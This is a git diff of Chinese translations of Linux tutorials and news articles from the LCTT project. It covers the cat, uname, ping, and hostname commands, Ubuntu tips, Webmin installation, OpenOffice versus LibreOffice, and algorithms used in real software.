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@ -0,0 +1,214 @@

> cat命令读取文件内容,并输出到标准设备上面
cat是一条linux内置命令. 几乎所有linux发行版都内置(译注:或者说我从未听说过不内置cat命令的发行版)。接下来,让我们开始学习如何使用.
### 1. 显示文件内容 ###
最简单的方法是直接输入‘cat file_name’.
# cat /etc/issue
CentOS release 5.10 (Final)
Kernel \r on an \m
### 2. 同时显示行号 ###
# cat -n /etc/ntp.conf
1 # Permit time synchronization our time resource but do not
2 # permit the source to query or modify the service on this system
3 restrict default kod nomodify notrap nopeer noquery
4 restrict -6 default kod nomodify notrap nopeer noquery
6 # Permit all access over the loopback interface. This could be
7 # tightened as well, but to do so would effect some of the
8 # administration functions
9 restrict
10 restrict -6 ::1
### 3. 在非空格行首显示行号 ###
#cat -b /etc/ntp.conf
1 # Permit time synchronization our time resource but do not
2 # permit the source to query or modify the service on this system
3 restrict default kod nomodify notrap nopeer noquery
4 restrict -6 default kod nomodify notrap nopeer noquery
5 # Permit all access over the loopback interface. This could be
6 # tightened as well, but to do so would effect some of the
7 # administration functions
8 restrict
9 restrict -6 ::1
### 4. 显示tab制表符 ###
当你想要显示文本中的tab制表位时. 可使用-T参数. 它会在输入结果中标识为 **\^I** .
# cat -T /etc/hosts
# Do not remove the following line, or various programs
# that require network functionality will fail.
||||^I^Ilocalhost.localdomain localhost
::1^I^Ilocalhost6.localdomain6 localhost6
### 5. 显示换行符 ###
-E参数在每行结尾使用 **$** 表示换行符。如下所示 :
# cat -E /etc/hosts
# Do not remove the following line, or various programs$
# that require network functionality will fail.$
|||| localhost.localdomain localhost$
::1 localhost6.localdomain6 localhost6$
### 6. 同时显示制表符及换行符 ###
当你想要同时达到-T及-E的效果, 可使用-A参数.
# cat -A /etc/hosts
# Do not remove the following line, or various programs$
# that require network functionality will fail.$
||||^I^Ilocalhost.localdomain localhost$
::1^I^Ilocalhost6.localdomain6 localhost6$
### 7. 分屏显示 ###
当文件内容显示超过了你的屏幕大小, 可结合cat命令与其它命令分屏显示。使用管道符 ( | )来连接。
# cat /proc/meminfo | less
# cat /proc/meminfo | more
### 8. 同时查看2个文件中的内容 ###
位于/root文件夹里有两个文件取名linux及desktop,每个文件含有以下内容 :
**Linux** : ubuntu, centos, redhat, mint and slackware
**Desktop** : gnome kde, xfce, enlightment, and cinnamon
当你想同时查看两文件中的内容时,可按如下方法 :
# cat /root/linux /root/desktop
### 9. 排序显示 ###
类似. 你也可以结合cat命令与其它命令来进行自定义输出. 如结合 **sort** ,通过管道符对内容进行排序显示。举例 :
# cat /root/linux | sort
### 10. 输入重定向 ###
你也可将显示结果输出重定向到屏幕或另一个文件。 只需要使用 > 符号(大于号)即可输出生成到另一个文件。
# cat /root/linux > /root/linuxdistro
### 11. 新建文件 ###
# cat > operating_system
当你输入cat > operating_system,它会生成一个operating_system的文件。然后下面会显示空行。此时你可输入内容。比如我们输入Unix, Linux, Windows 和 MacOS, 输入完成后,按**Ctrl-D**存盘退出cat。此时你会发现当前文件夹下会生成一个包含你刚才输入内容的叫 **operating_system**的文件。
### 12.向文件中追加内容 ###
当你使用两个 > 符时, 会将第一个文件中的内容追加到第二个文件的末尾。 举例 :
# cat /root/linux >> /root/desktop
# cat /root/desktop
它会将 /root/linux的内容追加到/root/desktop文件的末尾。
### 13. 重定向输入 ###
你可使用 **<**命令(小于号)将文件输入到cat中.
# cat < /root/linux
上面命令表示 /root/linux中的内容作为cat的输入。屏幕上显示如下 :
为了更清楚表示它的意义,我们使用以下命令 :
# cat < /root/linux | sort > linux-sort
此命令这样理解: **从/root/linux中读取内容,然后排序,将结果输出并生成linux-sort新文件**
然后我们看看linux-sort中的内容 :
以上是一些cat命令的日常基本应用. 更多相关你可从cat命令手册中学到并记得经常练习它们.
via: http://linoxide.com/linux-command/13-cat-command-examples/
译者:[hongchuntang](https://github.com/译者ID) 校对:[Caroline](https://github.com/carolinewuyan)
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创翻译,[Linux中国](http://linux.cn/) 荣誉推出
@ -0,0 +1,89 @@
### Q.1: Linux 操作系统的核心是什么? ###
- Shell
- Kernel
- Command
- Script
- Terminal
> **答**: 内核(Kernel)是Linux 操作系统的核心。Shell是一个命令行解释器,命令(Command)是针对计算机的指令,脚本(Script)是存储在文件中的命令的集合,终端(Termial)是命令行接口。
### Q.2: Linus Torvalds 都创建过什么东东? ###
- Fedora
- Slackware
- Debian
- Gentoo
- Linux
> **答**: Linux Torvalds 创建了Linux,Linux是所有上述操作系统的核心,同样也是其他一些Linux 操作系统的核心。
### Q.3: Torvalds,使用C++语言编写了Linux内核的大部分代码,是这样吗? ###
> **答**: 不! Linux内核包含了12,020,528行代码,其中注释占去了2,151,595 行。因此剩下的9,868,933 行就是纯代码了。而其中7,896,318行都是用C语言写的。
剩下的1,972,615行则是使用C++,汇编,Perl, Shell Script, Python, Bash Script, HTML, awk, yacc, lex, sed等。
### Q.4: 起初,Linux 是为 Intel X86 架构编写的,但是后来比其他操作系统移植的硬件平台都多,是这样吗 ? ###
> **答**: 是的,我同意。Linux那时候是为x86机器写的,而且现已移至到所有类型的平台。今天超过90%的超级计算机都在使用Linux。Linux在移动手机和平板电脑领域前景广阔。事实上我们被Linux包围着,远程遥控,太空科学,研究,Web,桌面计算等等,举之不尽。
### Q.5: 编辑 Linux 内核合法吗? ###
> **答**: 是的,内核基于GPL发布,任何人都可以基于GPL允许的权限随意编辑内核。Linux内核属于免费开源软件(FOSS)。
### Q.6: UNIX和Linux操作系统,本质上的不同在哪里?###
> **答**: Linux操作系统属于免费开源软件,内核是由 Linus Torvalds 和开源社区共同开发的。当然我们不能说UNIX操作系统和免费开源软件(FOSS)无关,BSD 就是基于 FOSS 范畴的 UNIX 的变种。而且大公司如 Apple,IBM,Oracle,HP等,都在为UNIX内核贡献代码。
### Q. 7: 挑出来一个与众不同的来. ###
- Slackware
- Solaris
> **答** : Slackware。 HP-UX, AIX, OSX, Solaris 分别是由 HP, IBM, APPLE, Oracle 开发的,并且都是UNIX的变种. Slackware 则是一个Linux操作系统.
### Q.8: Linux 不会感染病毒吗? ###
> **答** : 当然会! 这个地球上不存在不会感染病毒的操作系统。但是Linux以迄今为止病毒数量少而著称,是的,甚至比UNIX还要少。Linux榜上有名的病毒只有60-100个,而且没有一个病毒在传播蔓延。Unix粗略估计有85-120个。
### Q.9: Linux 属于哪种类型的操作系统? ###
- 多用户
- 多任务
- 多线程
- 以上所有
- 以上都不是
> **答** : 以上所有。Linux是一个支持多用户,可以同时运行多个进程执行多个任务的操作系统。
### Q.10: 一般的 Linux 命令的语法格式是: ###
- command [选项] [参数]
- command 选项 [参数]
- command [选项] [参数]
- command 选项 参数
> **答** : Linux 命令的正确语法是, Command [选项] [参数]。
### Q.11: 挑出来一个与众不同的来. ###
- Vi
- vim
- cd
- nano
> **答** : cd 与其他命令不同。Vi,vim和 nano都是编辑器,用于编辑文档,而cd是用于切换目录的命令。
via: http://www.tecmint.com/basic-linux-interview-questions-and-answers/
译者:[l3b2w1](https://github.com/l3b2w1) 校对:[jasminepeng](https://github.com/jasminepeng)
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创翻译,[Linux中国](http://linux.cn/) 荣誉推出
@ -1,9 +1,6 @@

当你在控制台模式下,无法通过“鼠标右键 > 关于”获取操作系统的信息。这时,在Linux下,你可以使用**uname**命令,帮助你完成这些工作。 Uname是**unix name**的缩写。在控制台中实际使用的时候只需键入**uname**。
@ -18,7 +15,7 @@
### 1. 内核名称 ###
# uname -s
@ -28,7 +25,7 @@
### 2. 内核发行版 ###
# uname -r
@ -36,7 +33,7 @@
### 3. 内核版本 ###
# uname -v
@ -56,7 +53,7 @@
CentOS release 5.10 (Final)
# cat /etc/issue
@ -74,7 +71,7 @@ i686表明了你用的是32位的操作系统,如果是X86_64则表明你用
### 6. 硬件平台 ###
# uname -i
@ -108,7 +105,7 @@ uname也可以透露你正在运行的操作系统信息,用**-o**参数可以
@ -1,4 +1,4 @@
Apache OpenOffice vs. LibreOffice 详解
Apache OpenOffice 与 LibreOffice 之间的抉择
> 这两个开源办公套件产品很相似,然而某一个貌似已经开始具有轻微的领先优势……
@ -10,7 +10,7 @@ Apache OpenOffice vs. LibreOffice 详解
@ -18,9 +18,9 @@ LibreOffice和OpenOffice之间的程序大部分都是一样的。例如它俩
一些更明显的区别体现在格式分类与字体支持上。例如,OpenOffice始终支持一些较老的保存格式,像AportisDoc(Palm版)和Pocket Word。另外,它也可以打开.docx格式的文件,但是无法像LibreOffice一样将文档保存为docx格式。
@ -32,35 +32,35 @@ OpenOffice和LibreOffice两者都能很好的支持插件扩展,想要加强
其次,LibreOffice的开发人员大部分是[Go-oo][3]的前成员,这是OpenOffice.org的一个非官方项目组,以“快速完善”为目标。当Apache OpenOffice项目组还在筹建中的时候,LibreOffice就已经吸引了全世界酷爱编程、热衷变革的天才们。
其次,LibreOffice的开发人员大部分是[Go-oo][3]的前成员,这是OpenOffice.org的一个非官方分支,以“快速完善”为目标。当Apache OpenOffice项目组还在筹建中的时候,LibreOffice就已经吸引了全世界酷爱编程、热衷变革的天才们。
其实,LibreOffice最重要的优势或许可以称之为“吸血许可证”。怎么个意思呢?就是OpenOffice的Apache许可证兼容LibreOffice的Lesser GNU通用公共许可证,但是LibreOffice的Less GNU通用公共许可证却不兼容OpenOffice的Apache许可证。换句话说,LibreOffice可以随意自由地从OpenOffice“借”代码,但是OpenOffice却根本无法从LibreOffice“借”到任何东西。严格地讲,如果想从LibreOffice“借”来某个功能,OpenOffice必须完全依靠“净室(clean-room)”来实现。
其实,LibreOffice最重要的优势或许可以称之为“吸血许可证”。怎么个意思呢?就是OpenOffice的Apache许可证兼容LibreOffice的Lesser GNU通用公共许可证,但是LibreOffice的Less GNU通用公共许可证却不兼容OpenOffice的Apache许可证。换句话说,LibreOffice可以随意自由地从OpenOffice“借”代码,但是OpenOffice却根本无法从LibreOffice“借”到任何东西。严格地讲,如果想从LibreOffice“借”来某个功能,OpenOffice必须完全从头实现。
这一情况有可能会改变,尤其是当Apache OpenOffice比LibreOffice拥有更高的知名度的时候,然而LibreOffice的支持者们正在迅速扩张,它的社区非常活跃,短短3年间所做的要比OpenOffice.org十二年来做的还要多。
@ -70,7 +70,7 @@ LibreOffice还拥有更多的“冒险创新精神”,例如,与导航栏类
via: http://www.datamation.com/applications/apache-openoffice-vs.-libreoffice-1.html
译者:[Mr小眼儿](http://blog.csdn.net/tinyeyeser) 校对:[校对者ID](https://github.com/校对者ID)
译者:[Mr小眼儿](http://blog.csdn.net/tinyeyeser) 校对:[wxy](https://github.com/wxy)
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创翻译,[Linux中国](http://linux.cn/) 荣誉推出
@ -0,0 +1,39 @@
Canonical Dev称Linux Mint“脆弱”,不要将其用于网银
**一位Canonical公司[工程师建议][1]:基于Ubuntu的流行操作系统Linux Mint用户不应该将其用于网银 。**
Mint决定禁止更新那些存在已知安全问题的安装包 - 从内核、浏览器到启动加载器和Xorg显示服务 - 这样给用户带来了一个“脆弱的系统” ,Oliver Grawert说。
> “不去马上整合Ubuntu提交的那些修正,而是拒绝这些软件包的(安全)更新。我要说,强制保持一个有缺陷的内核、浏览器或xorg,而不是允许安装更新补丁,这会变成一个易受攻击的系统,(原文如此)”。
> “就我个人而言,我不会用它做网银操作。”
当然不只有Grawert认为Mint在安全意识上的低下。Mozilla贡献者兼前Ubuntu成员 **Benjamin Kerensa** 也有同样的看法:
> “目前还不清楚为什么Linux Mint禁止所有的安全更新。我可以说,Mint需要花好几个月才能得到一个Firefox的修正版,而Ubuntu和Debian已经早在他们的包上打了安全补丁。
> 这将置Linux Mint用户处于危险中,也是我从来不建议任何人将Linux Mint作为一种替代Ubuntu的系统的主要原因之一。”
Oliver Grawert是一位可靠的撰稿人。作为一位Canonical公司下的Ubuntu工程师,他比大多数人更了解自己在说什么。
*请注意:我们已经向Linux Mint征求意见及澄清,答复将在后继文章发表。*
via: http://www.omgubuntu.co.uk/2013/11/canonical-dev-dont-use-linux-mint-online-banking-unsecure
译者:[whatever1992](https://github.com/whatever1992) 校对:[wxy](https://github.com/wxy)
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创翻译,[Linux中国](http://linux.cn/) 荣誉推出
published/201311/Core algorithms deployed.md
Normal file
published/201311/Core algorithms deployed.md
Normal file
@ -0,0 +1,298 @@
本文来源于一篇stackexchange的[问题][101]回答。提问者问到,我们在计算机科学和数学课程里面学习到的那些算法,到底在什么地方用到了?结果[Vijay D][103]给出一个洋洋洒洒的[深入回答][102],得到了提问者和众多围观。我们将这篇回答翻译过来以飨读者。
[Vijay D][103]写到:
### Linux内核中的基本数据结构和算法 ###
2.[B+ 树][5],这是一些你无法在教科书上找到的说明。
> 一个相对简单的B+树的实现。我把它作为一个学习练习来帮助理解B+树是如何工作的。这同样也被证明是有用的。
> ...
> 一个在教科书中并不常见的技巧。最小的值在右侧而不是在左侧。所有在一个节点里用到的槽都在左侧,所有没有用到的槽包含了空值(NUL)。大多数操作只简单地遍历所有的槽一次并在第一个空值时(NUL)终止。
3.[优先排序列表][6] 用于 [互斥量][7]、[驱动][8]等等。
> 根树的一个通用的用处是存储指针到结构页中。
> 《简单的基于CLR的只插入的,含有指针的定长优先级堆》第七章
> Knuth建议,用乘法哈希的机器字来表示接近黄金比例的素数的最大整数。Chuck Lever验证了该技术的有效性:
> [http://www.citi.umich.edu/techreports/reports/citi-tr-00-1.pdf][17]
> 这些素数的选择是位稀疏的,他们可以通过移位和加法操作,而不必使用乘法器,乘法器是很慢的。
> 使用了一种旋转哈希算法的哈希函数
> Knuth, D. 《计算机程序设计艺术, 卷 3: 排序与搜索》, 第6、7章. Addison Wesley, 1973
> 执行一个修改过的命名空间树的深度优先遍历,以指定的start_handle节点开始(及结束)。回调函数会在任何一个参数匹配的节点被发现时被调用。如果回调函数返回了一个非0值,搜索将会立即终止并且将其返回给调用者。
19.[Knuth-Morris-Pratt 字符串匹配][36],
> 根据Knuth、Morris和Pratt\[1\]实现了一个线性时间的字符串匹配算法。他们的算法避免了转换函数的显式地计算DELTA。对于长度为n的文本,其匹配时间是O(n),对于长度为m的模式(pattern),仅使用一个辅助函数PI[1 . .m],预先计算模式的时间为O(m)。数组PI允许转换函数DELTA被实时有效地计算。粗略地说,对于任何状态"q"= 0,1,…、m和在SIGMA中的任何字符"a",PI["q"]的值包含的信息是独立的"a"并需要计算DELTA("q","a") \[2\]。既然PI只有m个记录,而DELTA有O(m |SIGMA|)个记录,在预处理时间计算PI而不是DELTA的时候,我们可以节省一个因数|SIGMA|
> \[1\] Cormen, Leiserson, Rivest, Stein,算法介绍,第二版,MIT出版社
> \[2\] 见有限自动机原理
20.[Boyer-Moore 模式匹配][37]是在找替代品时的参考和建议。
> 实现了Boyer-Moore字符串匹配算法:
> \[1\] 《一个快速的字符串搜索算法》,R.S. Boyer and Moore.计算机通信协会,20(10), 1977, pp. 762-772. [http://www.cs.utexas.edu/users/moore/publications/fstrpos.pdf][38]
> \[2\] 《准确的字符串匹配算法手册》,Thierry Lecroq, 2004 [http://www-igm.univ-mlv.fr/~lecroq/string/string.pdf][39]
> 注:由于Boyer-Moore(BM)从右到左搜索匹配,仍然有可能匹配分布在多个块,在这种情况下该算法并没有优势。
> 如果你希望确保这样的事情永远不会发生,那使用Knuth-Pratt-Morris(KMP)实现。总之,根据您的设置适当地选择字符串搜索算法。
> 如果你正在用文本搜索器进行过滤,NIDS或任何类似的注重安全的目的,那么使用KMP。否则,如果你真的关心性能,并且你对数据包进行分类以使用服务质量(QoS)政策,当你不介意匹配可能分布分散,那么用BM。
### Chromium 浏览器中的数据结构和算法 ###
Chromium的([源代码在 Google code][40])。我只会列出一部分。我建议使用搜索来找到你最喜欢的算法或者数据结构。
> 这个树通过分配策略(分配器)参数化。这个策略用于C的可用存储区的列表分配,参见zone.h。
> Julian Walker的总结
> 红黑树是一个有趣的小东西。他们被认为比AVL树(它们的直接竞争对手)简单,乍一看这似乎是由于插入是一项轻松的乐事。然而,当你开始删除时,红黑树变得非常棘手。然而,通过复杂性的平衡,插入和删除可以使用单通道,实现自上而下的算法。这与AVL树情况不一样,插入只能自顶向下,删除则需要自下而上。
> ...
> 红黑树是很流行的,像大多数数据结构一样有一个古怪的名字。比如,在Java和c++库映射结构通常用红黑树实现。红黑树的速度也与AVL树相当。而AVL树平衡性不是很好,需要保持平衡的话红黑树通常更好。有一些流传的误解,但在大多数情况下对红黑树的宣传是准确的。
3.[AVL 树][46]
7.[Bresenham 算法][50]。
### 编程语言库 ###
1.[C++ STL][51]包含了链表、栈、队列、映射、向量和[排序][52]、[搜索和堆操作][53]算法。
2.[Java API][54]易于扩展的并且越来越多。
3.[Boost C++ 库][55]包含了像 Boyer-Moore以及Knuth-Morris-Pratt字符串匹配算法。
### 分配和调度算法 ###
4.[Richard Carr][58]的[时钟算法][57]用于Linux中的页面替换。
5.Intel i860处理器是一种随机替代策略。
7.Knuth在《计算机程序设计艺术 卷1》中讨论过的[Buddy内存分配算法][61]内用于Linux内核中,jemalloc并发分配器被用于FreeBSD和[facebook][62]中。
### *nix系统核心工具 ###
4.*GNU grep*,根据作者Mike Haertel实现了[Boyer-Mooresuan算法][65]。
6.[*Unix diff*][66]由Doug McIllroy实现,基于和James Hunt合作编写的原形。它比用于计算Levenshtein距离的标准动态规划算法执行地更好。[Linux 版本][67]计算最短编辑距离。
### 加密算法 ###
1.[Merkle 树][68],特别是 Tiger Tree Hash变种,被用于点对点应用,比如[GTK Gnutella][69]和[LimeWire][70]。
2.[MD5][71]被用于提供软件包的校验和并被用于在*nix系统上的完整性检测([Linux 实现][72]),同样也支持Windows和OSX。
### 编译器 ###
1.[LALR 解析][74]在yacc和bison实现。
### 压缩和图像处理 ###
### 冲突驱动语句学习算法 (CDCL) ###
自2000年以来,SAT求解器在工业标准的运行时间(通常是硬件工业,虽然其他地方也被使用)以近乎指数的方式每年下跌。这发展中很重要的一部分是冲突驱动语句学习算法,它结合了Davis Logemann和Loveland在约束规划和人工智能研究中关于语句学习的原始论文中的布尔约束传播算法。特定地,工业造型,SAT被认为是一个简单的问题([见这个讨论][77])。对我而言,这个一个最近最好的成功故事,因为它结合了这几年算法的不断发展、清晰的工程理念、实验性的评估、齐心协力地解决一个问题。[Malik 和 Zhang的CACM文章][78]值得阅读。这个算法在许多大学中教授(我参加过的4个地方都是如此),但是通常在一个逻辑或者形式方法课上。
via: http://cstheory.stackexchange.com/questions/19759/core-algorithms-deployed/19773#19773
译者:[geekpi](https://github.com/geekpi) 校对:[wxy](https://github.com/wxy)
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@ -1,19 +1,19 @@
Ubuntu是一个多用户操作系统。多用户操作系统意味着多个用户可以通过独立的、个人的HOME文件夹,文件和设置访问计算机。用户A可以登录并修改他/她自己的配置文件而不会影响用户 **B ** 的配置文件。

当如图所示的窗口打开后,点击“**用户账户(User Accounts)**”
当如图所示的窗口打开后,点击屏幕下方的“**用户账户(User Accounts)**”,如下图所示。


@ -21,17 +21,17 @@ Ubuntu是一个多用户操作系统。多用户操作系统意味着多个用

当你创建用户时有两种基本的账户类型: **标准用户 ** 和 **管理员** 。管理员权限用户有权限删除用户,安装软件和驱动,修改日期和时间,或者会进行一些可能使计算机不稳当的操作。
创建用户时有两种基本的账户类型: **标准用户** 和 **管理员** 。管理员权限用户有权限删除用户,安装软件和驱动,修改日期和时间,或者进行一些可能使计算机不稳定的操作。

@ -40,4 +40,4 @@ via: http://www.liberiangeek.net/2013/09/daily-ubuntu-tips-adding-user-accounts-
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译者:[SCUSJS](https://github.com/scusjs) 校对:[jasmiepeng](https://github.com/jasminepeng)
@ -0,0 +1,42 @@
> 如何更改Samba的工作组名和Ubuntu的计算机名称?
在键盘上按**Ctrl – Alt – T**打开终端来更改Ubuntu中的Samba工作组。当终端打开时,运行以下命令来编辑的Samba的配置文件。
sudo gedit /etc/samba/smb.conf

sudo apt-get install samba
via: http://www.liberiangeek.net/2013/11/daily-ubuntu-tips-change-samba-workgroup-and-computer-name/
译者:[crowner](https://github.com/crowner),[whatever1992](https://github.com/whatever1992) 校对:[wxy](https://github.com/wxy)
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@ -0,0 +1,42 @@
Ubuntu每日小贴士 - 在Ubuntu下创建虚拟网卡
sudo gedit /etc/network/interfaces

sudo service networking restart

via: http://www.liberiangeek.net/2013/11/daily-ubuntu-tips-create-virtual-network-cards-in-ubuntu-linux/
译者:[Luoxcat](https://github.com/Luoxcat) 校对:[wxy](https://github.com/wxy)
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@ -0,0 +1,46 @@
正如大家所知,Ubuntu 本身自带可以收发邮件的客户端——Thunderbird,当然它也支持Gmail,Yahoo Mail,Microsoft Outlook 等等支持IMAP协议的邮件服务。
Thunderbird 是一个功能强大的邮件客户端,只要email客户端所需要的功能,它都能够做到。但是如果你想选择一个能在够在GNOME 下运行的轻量级客户端,Geary 是一个不错的选择。
Geary 是一个界面简洁,能让你快捷方便的地阅读邮件的免费程序。它所有的对话均展示在一个简洁的面板上,这样你可以不必点击鼠标来切换消息。
Geary 还支持IMAP 协议,所以你可以使用Google, Yahoo 和 Microsoft 这样的在线邮箱服务。
以Ubuntu 13.10用户为例,Geary 可以在Ubuntu 的软件中心获取。只要运行以下命令即可安装Geary 。
sudo apt-get install geary
在以前的Ubuntu 版本中,键盘按下**Ctrl – Alt – T** 可以打开终端。打开之后,运行以下命令增加PPA源。
sudo add-apt-repository ppa:yorba/ppa
接下来运行以下命令来升级系统和安装Geary 。
sudo apt-get update && sudo apt-get install geary
第一次启动Geary时,你需要设置你的Gmail,Yahoo 或 Microsoft 电子邮件帐户。

设置非常的简单,只要输入你的账号信息,Geary 就会自动配置好你的账号。
若想卸载Geary ,首先要从系统中移除它的PPA源,要运行的命令如下。
sudo add-apt-repository -r ppa:yorba/ppa
然后再运行以下命令卸载Geary 。
sudo apt-get remove geary
via: http://www.liberiangeek.net/2013/11/daily-ubuntu-tips-get-geary-a-lightweight-email-reader-in-ubuntu/
译者:[NearTan](https://github.com/NearTan) 校对:[Caroline](https://github.com/carolinewuyan)
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published/201311/Five Examples Of The ping Utility.md
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published/201311/Five Examples Of The ping Utility.md
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@ -0,0 +1,68 @@
五个 ping 工具的使用实例
### 什么是 ping 工具###
### 查询主机的IP地址 ###
ping www.omgubuntu.com

### 查询正在使用的ping工具的版本信息 ###
用 -V 选项可以用来查询你手头上ping工具的版本信息。键入下列命令显示正在使用的ping工具的版本信息。
ping -V
正如你从图二见到的,我正在使用的是“ping utility,iputils-sss20101006”

### 自动退出 ping ###
当你用‘ping 主机’命令ping一台机器时,ping自己无法停止,你必需按下CTRL+C强行退出,或者你可以用 -c (count)选项指定发送包的数量。使用-c选项,当网络管理员(其实普通用户也可以)发送完指定数量的包之后,无需按CTRL+C,ping进程就会自动停止。
ping -c 13

### 指定数据包之间的时间间隔 ###
你知道ping每秒钟发送一个数据包吗?你喜欢快一点还是慢一点?用 -i 选项能指定包之间的时间间隔。用下列命令快速发送或慢速发送包。
### 每0.13秒发送一个包 ###
ping -i 0.13

### 每13秒发送一个包 ###
ping -i 13
### 结合 -i 选项和 -c 选项 ###
ping -c 13 -i 3

via: http://www.unixmen.com/five-examples-ping-utility/
译者:[Luoxcat](https://github.com/Luoxcat) 校对:[Mr小眼儿](http://blog.csdn.net/tinyeyeser)
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published/201311/How to manage Linux server with GUI.md
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published/201311/How to manage Linux server with GUI.md
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@ -0,0 +1,87 @@
另外一个成熟的桌面GUI的可选替代是使用 **基于Web的管理工具**。现在已经有许多基于Web的配置管理工具,如 [Webmin][1]、[ISPconfig][2]、[Zentyal][3]等。
在这篇教程中, 我会讲述 **怎样利用基于Web的界面工具来管理和配置Linux服务器**。
Webmin 是一个用`Perl`语言写的轻量级 (~20 MB) 系统配置工具。 Webmin 具有内置的web服务器, 允许用户通过web接口来配置Linux服务器。 其中一个优点是由于它是基于模块架构的,你可以选择性加载[模块][12]来扩展其功能。
### Linux服务器上安装Webmin ###
在 Ubuntu 或 Debian 系统中安装Webmin, 你可以使用如下命令。
$ sudo apt-get install perl libnet-ssleay-perl openssl libauthen-pam-perl libpam-runtime libio-pty-perl apt-show-versions python
$ wget http://prdownloads.sourceforge.net/webadmin/webmin_1.660_all.deb
$ sudo dpkg -i webmin_1.660_all.deb
在CentOS 或 RHEL 系统中安装Webmin, 使用如下命令:
$ wget http://prdownloads.sourceforge.net/webadmin/webmin_1.660_all.deb
$ sudo rpm -U webmin-1.660-1.noarch.rpm
### 使用 Webmin ###
安装好Webmin之后,你可以通过在浏览器中输入 https://\<主机的IP地址\>:10000 来使用。 如果你开启了防火墙, 请确保TCP端口 10000 没有被拦截。
同时, 请注意你应该使用 HTTPS, 而不是 HTTP。 否则, 会出现重定向错误。 Webmin 默认使用其自己生成的的SSL验证模式。
一旦你进入了Webmin登录页面, 你可以使用root身份登录 (当然需要输入root账户密码)或者使用具有root权限的任何用户账户登录。 登录成功后, 你可以看到如下Linux服务器的状态信息。
### Webmin 的特点 ###
Webmin 一个引以为豪的优点就是它几乎能够配置任何Linux服务器所支持的配置。接下来我来介绍,让你们大体了解它的一些重要功能。
设置引导时自动启动的服务, 同时显示他们相关配置信息。
实时监控服务器状态和其他服务, 同时配置定时监控及邮件提醒。 你也可以监控一系列服务器守护进程如 NFS、MySQL、 BIND DNS、Squid proxy、Apache Web server等, 或者监控系统资源如磁盘存储情况、内存使用和网络占用等。
配置 iptables-based firewall。
通过改变Webmin的相关配置,你可以控制管理 IP 地址,添加/删除 Webmin 功能模块,开启双因子认证来使用安全登录功能,或者创建证书验证等。
via: http://xmodulo.com/2013/11/manage-linux-server-gui.html
译者:[thinkinglk](https://github.com/译者ID) 校对:[Caroline](https://github.com/carolinewuyan)
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@ -0,0 +1,33 @@
Mark Shuttleworth为“茶派”及其他错误认错
**Canonical公司的创始人Mark Shuttleworth他澄清了他的[“茶派”论调][4],为他的言论而表示歉意。**

我们并不是每天都能看到Mark Shuttleworth连续道歉两次,很有可能这是第一次。
[第一个道歉][1]是对收到了Canonical公司法律团队邮件的fixubuntu.com的站长Micah F. Lee,他写了一篇广泛传播的关于这些问题的博客,并且在许多论坛和网站引起了热议。
Mark Shuttleworth首先在Google+向他道歉,接着他在其个人博客上写了正式的道歉文章,他的博客通常都是用于宣布重要事情的地方。
“这并不是说我建议我不需要这样技术反馈,而是一些假定我拒绝了包括技术反馈在内的所有反馈。我没有——我在说对软件的评价,并不是软件本身的中心,而是开发软件的人需求的综合,或者是某个自由软件协议下发布,或者是公司的策略、或者是公司后面的国家”,Mark Shuttleworth[说道][3]。
via: http://news.softpedia.com/news/Mark-Shuttleworth-Regrets-the-quot-Tea-Party-quot-Remarks-and-Other-Canonical-Mistakes-398819.shtml
译者:[Vito](https://github.com/vito-L) 校对:[wxy](https://github.com/wxy)
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@ -0,0 +1,50 @@
在几年之前,我遇到了这个问题,那时大多数打印机生产商不支持Linux系统。我有一台老式的只支持Windows和Mac OS X但却不支持Linux的打印机。(译注:除非是特别冷门的打印机,现在一般都可以在Linux进行打印操作了。在译者看来,本文的理由不成立,不过做法成立。)
首先,登入Windows,右击你要共享的打印机,然后点击‘**Printer properties(打印机属性)**’

接着,选择“**Sharing(共享)**”标签页,勾选‘**Share this printer(共享这台打印机)**’复选框来共享。记住共享打印机的名字,因为你要使用这个共享名来连接这台打印机。

netsh advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes
系统设置打开后,选择打印机,然后点击**添加**。当跳出来一个窗口让你选择设备时,选择‘**Windows Printer via SAMBA(使用SAMBA的Windows打印机)**’。



via: http://www.liberiangeek.net/2013/11/daily-ubuntu-tips-print-from-shared-windows-printers/
译者:[Linux-pdz](https://github.com/Linux-pdz) 校对:[Caroline](https://github.com/carolinewuyan)
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@ -0,0 +1,32 @@
好了,现在咱们开始吧,点击顶部右端面板中的齿轮按钮选择**System Settings(系统设置)**...

然后在系统设置选项中选择**Mouse & Touchpad (鼠标和触摸板)**,打开后选择‘**Right(右)**’选项,这样就可以改变鼠标的主键以适应左利手用户。

via: http://www.liberiangeek.net/2013/11/daily-ubuntu-tipsmake-the-mouse-left-handed-for-left-hand-users/
译者:[Linchenguang](https://github.com/Linchenguang) 校对:[wxy](https://github.com/wxy)
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published/How To Display And Set Hostname in Linux.md
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published/How To Display And Set Hostname in Linux.md
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@ -0,0 +1,145 @@

### 什么是hostname ###
从它的操作手册来看,hostname是用来显示系统的DNS名字以及为了显示和设置它的主机名或者NIS域名名字。所以hostname依赖于DNS(Domain Name System域名系统)或者NIS(Network Information System网络信息系统)。
### 怎么显示hostname ###
$ hostname
上面的命令将会告诉你,计算机的名字是**ubuntu** 。
### 如何设置hostname ###
# hostname dev-machine
$ hostname
使用hostname命令设置你的hostname **不是永久的** 。当你重启你的计算机,你的设定将会失效。 **为了永久改变** ,你必须手动修改hostname配置文件。
**Debian / Ubuntu系的Linux**
你可以在 **/etc/hostname** 和 **/etc/hosts** 文件夹中找到这个文件
# vi /etc/hostname
# vi /etc/hosts
|||| localhost
|||| dev-machine
**RedHat / CentOS系的Linux**
你可以在 **/etc/hosts** 和 **/etc/sysconfig/networks** 文件夹中找到这个文件。
|||| localhost.localdomain localhost dev-machine
### 怎么显示DNS域名 ###
$ dnsdomainname
在本篇文章,dnsdomainname命令的结果是 **bris.co.id**。
如果你看见结果是 (**none**),那么你的机器**没有配置FQDN(Fully Qualified Domain Name 完全符合标准的域名)** 。dnsdomainname命令摘取来自**/etc/hosts**文件的信息。你应该配置它为FQDN格式。下面是一个简单的例子:
|||| localhost.localdomain localhost dev-machine
|||| dev-machine.bris.co.id dev-machine
$ dnsdomainname -v
Resolving ‘dev-machine.bris.co.id’ …
Result: h_name=’dev-machine.bris.co.id’
Result: h_aliases=’dev-machine’
Result: h_addr_list=’’
